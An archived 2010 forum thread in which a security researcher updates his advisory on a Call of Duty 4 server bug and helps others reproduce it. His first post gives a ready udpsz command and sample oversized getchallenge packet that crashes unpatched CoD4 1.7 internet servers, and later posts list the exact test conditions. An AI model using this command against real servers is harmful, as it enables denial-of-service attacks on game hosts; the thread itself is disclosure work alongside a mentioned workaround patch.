Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:10

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 13 posts ] 
Author Message
 Post subject: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 08:53 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
just an update to the advisory I released 2 years ago.
indeed for exploiting this bug is not needed to join the server, it's enough a getchallenge packet with a long hash like the following example:

yyyygetchallenge 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...1024...aaa

so:
Code:
udpsz -C ffffffff6765746368616c6c656e6765203020 -b A SERVER PORT 2000
obviously if the server uses my cod4vawo.lpatch work-around it's immune.
for the additional info about the bug I remember my advisory:
http://aluigi.org/adv/cod4vamap-adv.txt


Top
 Profile  
 
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 13:07 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
I tried this, both from ingame, and with udpsz, but the bug simply doesnt work, and my server doesnt have that lpatch
it's cod4 1.7 (i guess that's the version it's supposed to work on)
i think i did all that it's supposed to be done to activate the exploit...


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 15:51 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
have you launched the server as internet server?

I forgot to say it (and I must still upload the updated advisory), but that part of the getchallenge packet involved in the bug doesn't work on LAN server.
so remember to start the server with +set dedicated 2


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 18:54 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
well, i tested it on server that i have for testing all stuff, and which is online all time (so it's dedicated)

i even tried from ingame, using callvote, and even when the vote passes, nothing happens
and my server doesnt have the patch


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 20:19 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
maybe you have a magic server :)


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 20:46 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
haha, maybe i do :P

tho, i asked a friend to test this out on his server too, and it came out with same result: nothing happened (didnt chec callvote, but that wasnt my goal anyways)
so im pretty convinced that this is patched somehow
btw. my friends server is cod5, not cod4


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 21:16 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
indeed cod5 is not vulnerable.
the "va overrun" bug and particularly that getchallenge way works only on cod4 in internet mode


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 21:44 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
hmm, well, if my server isnt vulnreable, then i dont really care if the exploit actually works or not :D


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 16:24 

Joined: 27 May 2010 19:08
Posts: 23
I got the same. It doesn't work.
It is a CoD 4 Dedicated 2 server. Voting is disabled. Or should voting be enabled?

I removed my server IP and replaced it with 00.
http://i27.tinypic.com/dbh66x.jpg


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 16:57 

Joined: 24 Jun 2010 10:04
Posts: 70
Location: aluigi not @ home
are you sure that server doesn't have my patches applied?
are you sure it is NOT a cracked server?
because that part with the aaaaaaa is an hash that the client sends to the server so that it checks it remotely with the cod4 auth server and then allows or rejects the client (needcdkey).

in any case the tests must be performed with a clean server so:
- install cod4
- patch with 1.07
- start the server with +set dedicated 2
- test it


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 17:14 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
now i know what was the problem- cracked server
either i didnt notice that you wrote that as a condition for bug to work, or you really didnt write that :P

anyways, i'l try to test it on non cracked and il post with what i turn out


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 17:23 

Joined: 24 Jun 2010 10:04
Posts: 70
Location: aluigi not @ home
I didn't write it because everytime I refer ever to the default installation without external customizations


Top
 Profile  
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 17:50 

Joined: 27 May 2010 19:08
Posts: 23
Yea it was cracked.
Sorry for my failing @ reading.

I will try it again.

Thanxs :)


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 13 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: